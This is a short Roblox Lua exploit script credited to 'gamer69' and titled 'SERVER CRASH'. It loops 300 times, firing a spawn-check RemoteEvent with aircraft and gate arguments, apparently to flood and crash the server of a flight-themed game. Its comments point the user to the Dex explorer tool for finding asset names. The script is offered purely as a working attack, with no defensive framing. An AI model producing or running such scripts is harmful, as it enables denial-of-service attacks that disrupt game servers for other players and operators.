Created by gamer69
Features:
- SERVER CRASH
-- server crash momento
local momento = {
[1] = "AirbusA330", -- aircraft name (use dex and go to replicatedstorage assets)
[2] = "SAS", -- aircraft liv (use dex and go to replicatedstorage assets)
[3] = "", -- idek
[4] = "Gatwick", -- omg location
[5] = "204" -- omg location gate
}
for i = 1,300 do
game:GetService("Players").LocalPlayer.PlayerGui.Spawning.GateSelection.PlayerCheck.CheckPlayer:FireServer(unpack(momento))
end